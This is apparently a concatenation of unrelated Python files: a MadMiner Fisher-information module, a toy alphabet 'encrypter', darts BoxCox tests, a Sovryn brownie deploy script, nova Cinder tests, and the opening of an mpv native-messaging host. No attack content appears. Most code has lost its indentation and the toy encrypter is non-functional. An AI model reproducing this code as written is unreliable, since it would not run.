assert ((0 <= bins) & (bins < n_bins_total)).all(), "Wrong bin {}".format(bins)
# Add up
for i in range(n_bins_total):
if len(weights_benchmarks[bins == i]) > 0:
weights_benchmarks_bins[i] += np.sum(weights_benchmarks[bins == i], axis=0)
fisher_info_full_bins[i] += np.sum(fisher_info_events[bins == i], axis=0)
# Calculate xsecs in bins
sigma_bins = mdot(theta_matrix, weights_benchmarks_bins) # (n_bins,)
# Calculate rate-only Fisher informations in bins
fisher_info_rate_bins = self._calculate_fisher_information(
theta, weights_benchmarks_bins, luminosity, sum_events=False
)
# Get rid of nuisance parameters
fisher_info_rate_bins = fisher_info_rate_bins[:, : self.n_parameters, : self.n_parameters]
# If ML: xsec info is still missing !
if model_file is not None:
fisher_info_full_bins += fisher_info_rate_bins
return bin_boundaries, sigma_bins, fisher_info_rate_bins, fisher_info_full_bins
def histogram_of_sigma_dsigma(self, theta, observable, nbins, histrange, cuts=None, efficiency_functions=None):
"""
Fills events into histograms and calculates the cross section and first derivative for each bin
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
observable : str
Expression for the observable to be sliced. The str will be parsed by Python's `eval()` function
and can use the names of the observables in the MadMiner files.
nbins : int
Number of bins in the slicing, excluding overflow bins.
histrange : tuple of float
Minimum and maximum value of the slicing in the form `(min, max)`. Overflow bins are always added.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
Returns
-------
bin_boundaries : ndarray
Observable slice boundaries.
sigma_bins : ndarray
Cross section in pb in each of the slices.
dsigma_bins : ndarray
Cross section in pb in each of the slices.
"""
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
# Binning
dynamic_binning = histrange is None
if dynamic_binning:
n_bins_total = nbins
bin_boundaries = self._calculate_dynamic_binning(observable, theta, nbins, None, cuts, efficiency_functions)
else:
n_bins_total = nbins + 2
bin_boundaries = np.linspace(histrange[0], histrange[1], num=nbins + 1)
# Prepare output
weights_benchmarks_bins = np.zeros((n_bins_total, self.n_benchmarks))
# Main loop: truth-level case
for observations, weights in self.event_loader():
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# Evaluate histogrammed observable
histo_observables = np.asarray([self._eval_observable(obs_event, observable) for obs_event in observations])
# Find bins
bins = np.searchsorted(bin_boundaries, histo_observables)
assert ((0 <= bins) & (bins < n_bins_total)).all(), "Wrong bin {}".format(bins)
# Add up
for i in range(n_bins_total):
if len(weights[bins == i]) > 0:
weights_benchmarks_bins[i] += np.sum(weights[bins == i], axis=0)
# Get morphing matrices
theta_matrix = self._get_theta_benchmark_matrix(theta, zero_pad=False) # (n_benchmarks_phys,)
dtheta_matrix = self._get_dtheta_benchmark_matrix(theta, zero_pad=False) # (n_parameters, n_benchmarks_phys)
# Calculate xsecs in bins
sigma_bins = mdot(theta_matrix, weights_benchmarks_bins) # (n_bins,)
dsigma_bins = mdot(dtheta_matrix, weights_benchmarks_bins) # (n_parameters,n_bins,)
return bin_boundaries, sigma_bins, dsigma_bins
def nuisance_constraint_information(self):
""" Builds the Fisher information term representing the Gaussian constraints on the nuisance parameters """
diagonal = np.array([0.0 for _ in range(self.n_parameters)] + [1.0 for _ in range(self.n_nuisance_parameters)])
return np.diag(diagonal)
def _check_binning_stats(
self, weights_benchmarks, weights_benchmark_uncertainties, theta, report=5, n_bins_last_axis=None
):
theta_matrix = self._get_theta_benchmark_matrix(theta, zero_pad=False) # (n_benchmarks_phys,)
sigma = mdot(theta_matrix, weights_benchmarks) # Shape (n_bins,)
sigma_uncertainties = mdot(theta_matrix, weights_benchmark_uncertainties) # Shape (n_bins,)
rel_uncertainties = sigma_uncertainties / np.maximum(sigma, 1.0e-12)
order = np.argsort(rel_uncertainties)[::-1]
logger.info("Bins with largest statistical uncertainties on rates:")
for i_bin in order[:report]:
bin_nd = i_bin + 1
if n_bins_last_axis is not None:
bin_nd = (i_bin // n_bins_last_axis + 1, i_bin % n_bins_last_axis + 1)
logger.info(
" Bin %s: (%.5f +/- %.5f) fb (%.0f %%)",
bin_nd,
1000.0 * sigma[i_bin],
1000.0 * sigma_uncertainties[i_bin],
100.0 * rel_uncertainties[i_bin],
)
def _calculate_binning(
self, bins, cuts, efficiency_functions, histrange, n_events_dynamic_binning, observable, theta
):
dynamic_binning = histrange is None and isinstance(bins, int)
if dynamic_binning:
n_bins_total = bins
bin_boundaries = self._calculate_dynamic_binning(
observable, theta, bins, n_events_dynamic_binning, cuts, efficiency_functions
)
logger.debug("Automatic dynamic binning: bin boundaries %s", bin_boundaries)
elif isinstance(bins, int):
n_bins_total = bins + 2
bin_boundaries = np.linspace(histrange[0], histrange[1], num=bins + 1)
else:
bin_boundaries = bins
n_bins_total = len(bins) + 1
return bin_boundaries, n_bins_total
def _calculate_fisher_information(
self,
theta,
weights_benchmarks,
luminosity=300000.0,
include_nuisance_parameters=True,
sum_events=False,
calculate_uncertainty=False,
weights_benchmark_uncertainties=None,
):
"""
Low-level function that calculates a list of full Fisher information matrices for a given parameter point and
benchmark weights. Do not use this function directly, instead use the other `FisherInformation` functions.
Parameters
----------
theta : ndarray
Parameter point.
weights_benchmarks : ndarray
Benchmark weights. Shape (n_events, n_benchmark).
luminosity : float, optional
Luminosity in pb^-1. Default value: 300000.
include_nuisance_parameters : bool, optional
If True, nuisance parameters are taken into account. Default value: True.
sum_events : bool, optional
If True, returns the summed FIsher information. Otherwise, a list of Fisher
information matrices for each event. Default value: False.
calculate_uncertainty : bool, optional
Whether an uncertainty of the result is calculated. Note that this uncertainty is currently only
implemented for the "physical" part of the FIsher information, not for the nuisance parameters. Default
value: False.
weights_benchmark_uncertainties : ndarray or None, optional
If calculate_uncertainty is True, weights_benchmark_uncertainties sets the uncertainties on each entry of
weights_benchmarks. If None, weights_benchmark_uncertainties = weights_benchmarks is assumed.
Returns
-------
fisher_information : ndarray
If sum_events is True, the return value is an nxn matrix, the total Fisher information
summed over all events. Otherwise, a n_events x n_parameters x n_parameters tensor is returned that
includes the Fisher information matrices for each event separately.
fisher_information_uncertainty : ndarray
Only returned if calculate_uncertainty is True. Covariance matrix of the Fisher information. Note that this
does not take into account any uncertainty on the nuisance parameter part of the Fisher information, and
correlations between events are neglected. Note that independent of sum_events, the covariance matrix is
always summed over the events.
"""
include_nuisance_parameters = include_nuisance_parameters and self.include_nuisance_parameters
# Get morphing matrices
theta_matrix = self._get_theta_benchmark_matrix(theta, zero_pad=False) # (n_benchmarks_phys,)
dtheta_matrix = self._get_dtheta_benchmark_matrix(theta, zero_pad=False) # (n_parameters, n_benchmarks_phys)
        # Get the differential xsec per event, and the derivative wrt theta
sigma = mdot(theta_matrix, weights_benchmarks) # Shape (n_events,)
total_xsec = np.sum(sigma)
inv_sigma = sanitize_array(1.0 / sigma) # Shape (n_events,)
dsigma = mdot(dtheta_matrix, weights_benchmarks) # Shape (n_parameters, n_events)
# Calculate physics Fisher info for this event
fisher_info_phys = luminosity * np.einsum("n,in,jn->nij", inv_sigma, dsigma, dsigma)
# Nuisance parameter Fisher info
if include_nuisance_parameters:
nuisance_a = self.nuisance_morpher.calculate_a(weights_benchmarks) # Shape (n_nuisance_params, n_events)
# grad_i dsigma(x), where i is a nuisance parameter, is given by
# sigma[np.newaxis, :] * a
fisher_info_nuisance = luminosity * np.einsum("n,in,jn->nij", sigma, nuisance_a, nuisance_a)
fisher_info_mix = luminosity * np.einsum("in,jn->nij", dsigma, nuisance_a)
fisher_info_mix_transposed = luminosity * np.einsum("in,jn->nji", dsigma, nuisance_a)
n_all_parameters = self.n_parameters + self.n_nuisance_parameters
fisher_info = np.zeros((fisher_info_phys.shape[0], n_all_parameters, n_all_parameters))
fisher_info[:, : self.n_parameters, : self.n_parameters] = fisher_info_phys
fisher_info[:, : self.n_parameters, self.n_parameters :] = fisher_info_mix
fisher_info[:, self.n_parameters :, : self.n_parameters] = fisher_info_mix_transposed
fisher_info[:, self.n_parameters :, self.n_parameters :] = fisher_info_nuisance
else:
n_all_parameters = self.n_parameters
fisher_info = fisher_info_phys
# Error propagation
if calculate_uncertainty:
if weights_benchmarks.shape[1] > self.n_benchmarks_phys:
weights_benchmarks_phys = weights_benchmarks[:, np.logical_not(self.benchmark_is_nuisance)]
else:
weights_benchmarks_phys = weights_benchmarks
n_events = weights_benchmarks_phys.shape[0]
# Input uncertainties
if weights_benchmark_uncertainties is None:
weights_benchmark_uncertainties = weights_benchmarks_phys # Shape (n_events, n_benchmarks_phys)
# Build covariance matrix of inputs
# We assume full correlation between weights_benchmarks[i, b1] and weights_benchmarks[i, b2]
covariance_inputs = np.zeros((n_events, self.n_benchmarks_phys, self.n_benchmarks_phys))
for i in range(n_events):
for b1 in range(self.n_benchmarks_phys):
for b2 in range(self.n_benchmarks_phys):
if b1 == b2: # Diagonal
covariance_inputs[i, b1, b2] = weights_benchmark_uncertainties[i, b1] ** 2
else: # Off-diagonal, same event
covariance_inputs[i, b1, b2] = (
weights_benchmark_uncertainties[i, b1] * weights_benchmark_uncertainties[i, b2]
)
# Jacobian
temp1 = np.einsum("ib,jn,n->ijnb", dtheta_matrix, dsigma, inv_sigma)
temp2 = np.einsum("jb,in,n->ijnb", dtheta_matrix, dsigma, inv_sigma)
temp3 = np.einsum("b,in,jn,n,n->ijnb", theta_matrix, dsigma, dsigma, inv_sigma, inv_sigma)
temp1, temp2, temp3 = sanitize_array(temp1), sanitize_array(temp2), sanitize_array(temp3)
jacobian = luminosity * (temp1 + temp2 + temp3) # (n_parameters, n_parameters, n_events, n_benchmarks_phys)
# Covariance of information
covariance_information_phys = np.einsum("ijnb,nbc,klnc->ijkl", jacobian, covariance_inputs, jacobian)
if include_nuisance_parameters:
covariance_information = np.zeros(
(n_all_parameters, n_all_parameters, n_all_parameters, n_all_parameters)
)
covariance_information[
: self.n_parameters, : self.n_parameters, : self.n_parameters, : self.n_parameters
] = covariance_information_phys
else:
covariance_information = covariance_information_phys
if sum_events:
return np.sum(fisher_info, axis=0), covariance_information
return fisher_info, covariance_information
if sum_events:
return np.sum(fisher_info, axis=0)
return fisher_info
def _pass_cuts(self, observations, cuts=None):
"""
Checks if an event, specified by a list of observations, passes a set of cuts.
Parameters
----------
observations : list of float
list of float. Values of the observables for a single event.
cuts : list of str or None, optional
Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
Returns
-------
passes : bool
True if the event passes all cuts, False otherwise.
"""
# Check inputs
if cuts is None:
cuts = []
assert len(observations) == len(self.observables), "Mismatch between observables and observations"
# Variables that can be used in cuts
variables = math_commands()
for observable_name, observable_value in zip(self.observables, observations):
variables[observable_name] = observable_value
# Check cuts
for cut in cuts:
if not bool(eval(cut, variables)):
return False
return True
def _eval_efficiency(self, observations, efficiency_functions=None):
"""
Calculates the efficiency for an event.
Parameters
----------
observations : list of float
Values of the observables.
efficiency_functions : list of str or None
Each entry is a parseable Python expression that returns a float for the efficiency of one component.
Default value: None.
Returns
-------
efficiency : float
Efficiency (0. <= efficiency <= 1.), product of the results of the calls to all entries in
efficiency_functions.
"""
# Check inputs
if efficiency_functions is None:
efficiency_functions = []
assert len(observations) == len(self.observables), "Mismatch between observables and observations"
# Variables that can be used in efficiency functions
variables = math_commands()
for observable_name, observable_value in zip(self.observables, observations):
variables[observable_name] = observable_value
        # Evaluate efficiency functions
efficiency = 1.0
        for efficiency_function in efficiency_functions:
            efficiency *= float(eval(efficiency_function, variables))
return efficiency
def _eval_observable(self, observations, observable_definition):
"""
Calculates an observable expression for an event.
Parameters
----------
observations : ndarray
Values of the observables for an event, should have shape `(n_observables,)`.
observable_definition : str
A parseable Python expression that returns the value of the observable to be calculated.
Returns
-------
observable_value : float
Value of the observable defined in observable_definition.
"""
assert len(observations) == len(self.observables), "Mismatch between observables and observations"
        # Variables that can be used in the observable definition
variables = math_commands()
for observable_name, observable_value in zip(self.observables, observations):
variables[observable_name] = observable_value
        # Evaluate the observable
return float(eval(observable_definition, variables))
def _calculate_xsec(
self,
theta=None,
cuts=None,
efficiency_functions=None,
return_benchmark_xsecs=False,
return_error=False,
include_nuisance_parameters=True,
start_event=0,
):
"""
Calculates the total cross section for a parameter point.
Parameters
----------
theta : ndarray or None, optional
The parameter point. If None, return_benchmark_xsecs should be True. Default value: None.
cuts : list of str or None, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
return_benchmark_xsecs : bool, optional
If True, this function returns the benchmark xsecs. Otherwise, it returns the xsec at theta. Default value:
False.
return_error : bool, optional
If True, this function also returns the square root of the summed squared weights.
include_nuisance_parameters : bool, optional
If True and if return_benchmark_xsecs is True, the nuisance benchmarks are included in the output. Default
value: True.
start_event : int, optional
Index of first event in MadMiner file to consider. Default value: 0.
Returns
-------
xsec : ndarray or float
If return_benchmark_xsecs is True, an ndarray of benchmark xsecs in pb is returned. Otherwise, the cross
section at theta in pb is returned.
xsec_uncertainty : ndarray or float
Only returned if return_error is True. Uncertainty (square root of the summed squared weights) on xsec.
"""
logger.debug("Calculating total cross section for theta = %s", theta)
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
assert (theta is not None) or return_benchmark_xsecs, "Please supply theta or set return_benchmark_xsecs=True"
# Total xsecs for benchmarks
xsecs_benchmarks = None
xsecs_uncertainty_benchmarks = None
for observations, weights in self.event_loader(
start=start_event, include_nuisance_parameters=include_nuisance_parameters
):
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# xsecs
if xsecs_benchmarks is None:
xsecs_benchmarks = np.sum(weights, axis=0)
xsecs_uncertainty_benchmarks = np.sum(weights ** 2, axis=0)
else:
xsecs_benchmarks += np.sum(weights, axis=0)
xsecs_uncertainty_benchmarks += np.sum(weights ** 2, axis=0)
assert xsecs_benchmarks is not None, "No events passed cuts"
xsecs_uncertainty_benchmarks = xsecs_uncertainty_benchmarks ** 0.5
logger.debug("Benchmarks xsecs [pb]: %s", xsecs_benchmarks)
if return_benchmark_xsecs:
if return_error:
return xsecs_benchmarks, xsecs_uncertainty_benchmarks
return xsecs_benchmarks
# Translate to xsec for theta
theta_matrix = self._get_theta_benchmark_matrix(theta)
xsec = mdot(theta_matrix, xsecs_benchmarks)
xsec_error = mdot(theta_matrix, xsecs_uncertainty_benchmarks)
logger.debug("Theta matrix: %s", theta_matrix)
logger.debug("Cross section at theta: %s pb", xsec)
if return_error:
return xsec, xsec_error
return xsec
def _calculate_dynamic_binning(
self, observable, theta, n_bins, n_events=None, cuts=None, efficiency_functions=None
):
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
# Quantile values
quantile_values = np.linspace(0.0, 1.0, n_bins + 1)
# Get data
x_pilot, weights_pilot = next(self.event_loader(batch_size=n_events))
# Cuts
cut_filter = [self._pass_cuts(x, cuts) for x in x_pilot]
x_pilot = x_pilot[cut_filter]
weights_pilot = weights_pilot[cut_filter]
# Efficiencies
efficiencies = np.array([self._eval_efficiency(x, efficiency_functions) for x in x_pilot])
weights_pilot *= efficiencies[:, np.newaxis]
# Evaluate histogrammed observable
histo_observables_pilot = np.asarray([self._eval_observable(x, observable) for x in x_pilot])
# Weights at theta
theta_matrix = self._get_theta_benchmark_matrix(theta)
weight_theta_pilot = mdot(theta_matrix, weights_pilot)
# Bin boundaries
bin_boundaries = weighted_quantile(histo_observables_pilot, quantile_values, weight_theta_pilot)
bin_boundaries = bin_boundaries[1:-1]
return bin_boundaries
# Aliases for backward compatibility
calculate_fisher_information_full_truth = truth_information
calculate_fisher_information_full_detector = full_information
calculate_fisher_information_rate = rate_information
calculate_fisher_information_hist1d = histo_information
calculate_fisher_information_hist2d = histo_information_2d
histogram_of_fisher_information = histogram_of_information
calculate_fisher_information_nuisance_constraints = nuisance_constraint_information
|
the-stack_0_1566 | import math
import itertools
def menu():
while True:
try:
print(menuStr)
print(stars)
choose = int(input("For Encrypter = 1\nFor Decrypter = 2\nFor Exit = 0\nChoose : "))
print(stars)
break
except:
            print("There is a problem with the input.")
pass
if choose == 1:
print("Encrypter opening...")
print(stars)
myEncrypter()
elif choose == 2:
print("Decrypter opening...")
myDecrypter()
elif choose == 0:
print("Cya dude.")
else:
        print("Menu error.")
menu()
def myEncrypter():
inputWord = str(input("Input : "))
print(stars)
iList = list(inputWord)
aList = []
tempList = []
outputList = []
t=0
for item in iList:
try:
aList.append(((alphabet.index(item)+1)*2)%29)
except:
            print("Currently only letters of the alphabet are supported.")
iList.clear()
myEncrypter()
for x in aList:
tempList = list(str(math.sin(x)))
tempList.reverse()
for items in itertools.islice(tempList,0,3):
outputList.append(items)
for a in outputList:
        if t == 0: print("Your result: ", end="")
t+=1
print(a,end="")
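# Example of the encoding above (letter chosen for illustration): 'a' has alphabet
# index 0 and maps to ((0 + 1) * 2) % 29 = 2; the three characters appended to the
# output are then the last three characters of str(math.sin(2)), taken in reverse order.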
def myDecrypter():
print("b")
alphabet = ['a', 'b', 'c', 'ç', 'd', 'e', 'f', 'g', 'ğ', 'h', 'ı', 'i', 'j',
'k', 'l', 'm', 'n', 'o', 'ö', 'p', 'r', 's', 'ş', 't', 'u', 'ü',
'v', 'y', 'z']
menuStr = """
_______________________________________________________________________________________
_____ _
_ __ ___ _ _| ____|_ __ ___ _ __ _ _ _ __ | |_ ___ _ __
| '_ ` _ \| | | | _| | '_ \ / __| '__| | | | '_ \| __/ _ \ '__|
| | | | | | |_| | |___| | | | (__| | | |_| | |_) | || __/ |
|_| |_| |_|\__, |_____|_| |_|\___|_| \__, | .__/ \__\___|_|
|___/ |___/|_| v.0.0.2
_________________________________________________________________________________________
"""
stars = "_" * 89
menu() |
the-stack_0_1569 | import unittest
import pandas as pd
import numpy as np
from copy import deepcopy
from darts.dataprocessing.transformers import BoxCox, Mapper
from darts.utils.timeseries_generation import sine_timeseries, linear_timeseries
from darts import TimeSeries
class BoxCoxTestCase(unittest.TestCase):
sine_series = sine_timeseries(length=50, value_y_offset=5, value_frequency=0.05)
lin_series = linear_timeseries(start_value=1, end_value=10, length=50)
multi_series = sine_series.stack(lin_series)
    def test_boxcox_lambda(self):
boxcox = BoxCox(lmbda=0.3)
boxcox.fit(self.multi_series)
self.assertEqual(boxcox._fitted_params, [[0.3, 0.3]])
boxcox = BoxCox(lmbda=[0.3, 0.4])
boxcox.fit(self.multi_series)
self.assertEqual(boxcox._fitted_params, [[0.3, 0.4]])
with self.assertRaises(ValueError):
boxcox = BoxCox(lmbda=[0.2, 0.4, 0.5])
boxcox.fit(self.multi_series)
boxcox = BoxCox(optim_method="mle")
boxcox.fit(self.multi_series)
lmbda1 = boxcox._fitted_params[0].tolist()
boxcox = BoxCox(optim_method="pearsonr")
boxcox.fit(self.multi_series)
lmbda2 = boxcox._fitted_params[0].tolist()
self.assertNotEqual(lmbda1, lmbda2)
def test_boxcox_transform(self):
log_mapper = Mapper(lambda x: np.log(x))
boxcox = BoxCox(lmbda=0)
transformed1 = log_mapper.transform(self.sine_series)
transformed2 = boxcox.fit(self.sine_series).transform(self.sine_series)
np.testing.assert_almost_equal(
transformed1.all_values(copy=False),
transformed2.all_values(copy=False),
decimal=4,
)
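    # Background for the test above: the Box-Cox transform is
    #   y = (x**lmbda - 1) / lmbda   for lmbda != 0
    #   y = log(x)                   for lmbda == 0
    # so a BoxCox(lmbda=0) transformer should agree with a plain log Mapper.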
def test_boxcox_inverse(self):
boxcox = BoxCox()
transformed = boxcox.fit_transform(self.multi_series)
back = boxcox.inverse_transform(transformed)
pd.testing.assert_frame_equal(
self.multi_series.pd_dataframe(), back.pd_dataframe(), check_exact=False
)
def test_boxcox_multi_ts(self):
test_cases = [
([[0.2, 0.4], [0.3, 0.6]]), # full lambda
(0.4), # single value
None, # None
]
for lmbda in test_cases:
box_cox = BoxCox(lmbda=lmbda)
transformed = box_cox.fit_transform([self.multi_series, self.multi_series])
back = box_cox.inverse_transform(transformed)
pd.testing.assert_frame_equal(
self.multi_series.pd_dataframe(),
back[0].pd_dataframe(),
check_exact=False,
)
pd.testing.assert_frame_equal(
self.multi_series.pd_dataframe(),
back[1].pd_dataframe(),
check_exact=False,
)
def test_boxcox_multiple_calls_to_fit(self):
"""
This test checks whether calling the scaler twice is calculating new lambdas instead of
keeping the old ones
"""
box_cox = BoxCox()
box_cox.fit(self.sine_series)
lambda1 = deepcopy(box_cox._fitted_params)[0].tolist()
box_cox.fit(self.lin_series)
lambda2 = deepcopy(box_cox._fitted_params)[0].tolist()
self.assertNotEqual(
lambda1, lambda2, "Lambdas should change when the transformer is retrained"
)
def test_multivariate_stochastic_series(self):
transformer = BoxCox()
vals = np.random.rand(10, 5, 10)
series = TimeSeries.from_values(vals)
new_series = transformer.fit_transform(series)
series_back = transformer.inverse_transform(new_series)
# Test inverse transform
np.testing.assert_allclose(series.all_values(), series_back.all_values())
|
the-stack_0_1570 | #!/usr/bin/python3
from brownie import *
from scripts.deployment.deploy_protocol import deployProtocol
from scripts.deployment.deploy_loanToken import deployLoanTokens
from scripts.deployment.deploy_tokens import deployTokens, readTokens
from scripts.deployment.deploy_multisig import deployMultisig
import shared
import json
from munch import Munch
'''
Deploys all of the contracts.
1. deploys the tokens or reads existing token contracts.
if configData contains token addresses, use the given addresses
else, deploy new tokens
2. deploys the base protocol contracts.
3. deploys, configures and tests the loan token contracts.
4. writes the relevant contract addresses into swap_test.json.
'''
def main():
global configData
#owners = [accounts[0], accounts[1], accounts[2]]
requiredConf=2
configData = {} # deploy new tokens
'''
configData = {
'WRBTC': '0x69FE5cEC81D5eF92600c1A0dB1F11986AB3758Ab',
'SUSD': '0xCb46C0DdC60d18eFEB0e586c17AF6Ea36452DaE0',
'medianizer': '0x2d39Cc54dc44FF27aD23A91a9B5fd750dae4B218'
}
'''
thisNetwork = network.show_active()
if thisNetwork == "development":
acct = accounts[0]
elif thisNetwork == "testnet" or thisNetwork == "rsk-mainnet":
acct = accounts.load("rskdeployer")
else:
raise Exception("network not supported")
if('WRBTC' in configData and 'SUSD' in configData):
tokens = readTokens(acct, configData['WRBTC'], configData['SUSD'])
elif('SUSD' in configData):
tokens = deployWRBTC(acct, configData['SUSD'])
else:
tokens = deployTokens(acct)
if(not 'medianizer' in configData):
medianizer = deployMoCMockup(acct)
configData['medianizer'] = medianizer.address
if(not 'mocState' in configData):
mocState = deployBProPriceFeedMockup(acct)
configData['mocState'] = mocState.address
(sovryn, feeds) = deployProtocol(acct, tokens, configData['medianizer'])
(loanTokenSUSD, loanTokenWRBTC, loanTokenSettingsSUSD,
loanTokenSettingsWRBTC) = deployLoanTokens(acct, sovryn, tokens)
#deployMultisig(sovryn, acct, owners, requiredConf)
configData["sovrynProtocol"] = sovryn.address
configData["PriceFeeds"] = feeds.address
configData["WRBTC"] = tokens.wrbtc.address
configData["SUSD"] = tokens.susd.address
configData["loanTokenSettingsSUSD"] = loanTokenSettingsSUSD.address
configData["loanTokenSUSD"] = loanTokenSUSD.address
configData["loanTokenSettingsWRBTC"] = loanTokenSettingsWRBTC.address
configData["loanTokenRBTC"] = loanTokenWRBTC.address
with open('./scripts/swapTest/swap_test.json', 'w') as configFile:
json.dump(configData, configFile)
def deployMoCMockup(acct):
priceFeedMockup = acct.deploy(PriceFeedsMoCMockup)
priceFeedMockup.setHas(True)
priceFeedMockup.setValue(10000e18)
return priceFeedMockup
def deployBProPriceFeedMockup(acct):
bproPriceFeedMockup = acct.deploy(BProPriceFeedMockup)
bproPriceFeedMockup.setValue(20000e18)
return bproPriceFeedMockup |
the-stack_0_1571 | # Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinderclient.v1 import client as cinder_client_v1
from cinderclient.v2 import client as cinder_client_v2
from requests_mock.contrib import fixture
from testtools import matchers
from nova import context
from nova import exception
from nova import test
from nova.volume import cinder
_image_metadata = {
'kernel_id': 'fake',
'ramdisk_id': 'fake'
}
class BaseCinderTestCase(object):
def setUp(self):
super(BaseCinderTestCase, self).setUp()
cinder.reset_globals()
self.requests = self.useFixture(fixture.Fixture())
self.api = cinder.API()
self.context = context.RequestContext('username',
'project_id',
auth_token='token',
service_catalog=self.CATALOG)
def flags(self, *args, **kwargs):
super(BaseCinderTestCase, self).flags(*args, **kwargs)
cinder.reset_globals()
def create_client(self):
return cinder.cinderclient(self.context)
def test_context_with_catalog(self):
self.assertEqual(self.URL, self.create_client().client.get_endpoint())
def test_cinder_http_retries(self):
retries = 42
self.flags(http_retries=retries, group='cinder')
self.assertEqual(retries, self.create_client().client.connect_retries)
def test_cinder_api_insecure(self):
# The True/False negation is awkward, but better for the client
# to pass us insecure=True and we check verify_cert == False
self.flags(insecure=True, group='cinder')
self.assertFalse(self.create_client().client.session.verify)
def test_cinder_http_timeout(self):
timeout = 123
self.flags(timeout=timeout, group='cinder')
self.assertEqual(timeout, self.create_client().client.session.timeout)
def test_cinder_api_cacert_file(self):
cacert = "/etc/ssl/certs/ca-certificates.crt"
self.flags(cafile=cacert, group='cinder')
self.assertEqual(cacert, self.create_client().client.session.verify)
class CinderTestCase(BaseCinderTestCase, test.NoDBTestCase):
"""Test case for cinder volume v1 api."""
URL = "http://localhost:8776/v1/project_id"
CATALOG = [{
"type": "volumev2",
"name": "cinderv2",
"endpoints": [{"publicURL": URL}]
}]
def create_client(self):
c = super(CinderTestCase, self).create_client()
self.assertIsInstance(c, cinder_client_v1.Client)
return c
def stub_volume(self, **kwargs):
volume = {
'display_name': None,
'display_description': None,
"attachments": [],
"availability_zone": "cinder",
"created_at": "2012-09-10T00:00:00.000000",
"id": '00000000-0000-0000-0000-000000000000',
"metadata": {},
"size": 1,
"snapshot_id": None,
"status": "available",
"volume_type": "None",
"bootable": "true"
}
volume.update(kwargs)
return volume
def test_cinder_endpoint_template(self):
endpoint = 'http://other_host:8776/v1/%(project_id)s'
self.flags(endpoint_template=endpoint, group='cinder')
self.assertEqual('http://other_host:8776/v1/project_id',
self.create_client().client.endpoint_override)
def test_get_non_existing_volume(self):
self.requests.get(self.URL + '/volumes/nonexisting',
status_code=404)
self.assertRaises(exception.VolumeNotFound, self.api.get, self.context,
'nonexisting')
def test_volume_with_image_metadata(self):
v = self.stub_volume(id='1234', volume_image_metadata=_image_metadata)
m = self.requests.get(self.URL + '/volumes/5678', json={'volume': v})
volume = self.api.get(self.context, '5678')
self.assertThat(m.last_request.path,
matchers.EndsWith('/volumes/5678'))
self.assertIn('volume_image_metadata', volume)
self.assertEqual(_image_metadata, volume['volume_image_metadata'])
class CinderV2TestCase(BaseCinderTestCase, test.NoDBTestCase):
"""Test case for cinder volume v2 api."""
URL = "http://localhost:8776/v2/project_id"
CATALOG = [{
"type": "volumev2",
"name": "cinder",
"endpoints": [{"publicURL": URL}]
}]
def setUp(self):
super(CinderV2TestCase, self).setUp()
cinder.CONF.set_override('catalog_info',
'volumev2:cinder:publicURL', group='cinder')
self.addCleanup(cinder.CONF.reset)
def create_client(self):
c = super(CinderV2TestCase, self).create_client()
self.assertIsInstance(c, cinder_client_v2.Client)
return c
def stub_volume(self, **kwargs):
volume = {
'name': None,
'description': None,
"attachments": [],
"availability_zone": "cinderv2",
"created_at": "2013-08-10T00:00:00.000000",
"id": '00000000-0000-0000-0000-000000000000',
"metadata": {},
"size": 1,
"snapshot_id": None,
"status": "available",
"volume_type": "None",
"bootable": "true"
}
volume.update(kwargs)
return volume
def test_cinder_endpoint_template(self):
endpoint = 'http://other_host:8776/v2/%(project_id)s'
self.flags(endpoint_template=endpoint, group='cinder')
self.assertEqual('http://other_host:8776/v2/project_id',
self.create_client().client.endpoint_override)
def test_get_non_existing_volume(self):
self.requests.get(self.URL + '/volumes/nonexisting',
status_code=404)
self.assertRaises(exception.VolumeNotFound, self.api.get, self.context,
'nonexisting')
def test_volume_with_image_metadata(self):
v = self.stub_volume(id='1234', volume_image_metadata=_image_metadata)
self.requests.get(self.URL + '/volumes/5678', json={'volume': v})
volume = self.api.get(self.context, '5678')
self.assertIn('volume_image_metadata', volume)
self.assertEqual(_image_metadata, volume['volume_image_metadata'])
|
the-stack_0_1573 | #!/usr/bin/env python3
import json
import os
import platform
import struct
import sys
import subprocess
def main():
message = get_message()
url = message.get("url")
    args = ["mpv", "--", url]  # run mpv without a terminal wrapper because we need to capture the output of yt-dlp
kwargs = {}
# https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Native_messaging#Closing_the_native_app
if platform.system() == "Windows":
kwargs["creationflags"] = subprocess.CREATE_BREAKAWAY_FROM_JOB
# HACK(ww): On macOS, graphical applications inherit their path from `launchd`
# rather than the default path list in `/etc/paths`. `launchd` doesn't include
# `/usr/local/bin` in its default list, which means that any installations
# of MPV and/or youtube-dl under that prefix aren't visible when spawning
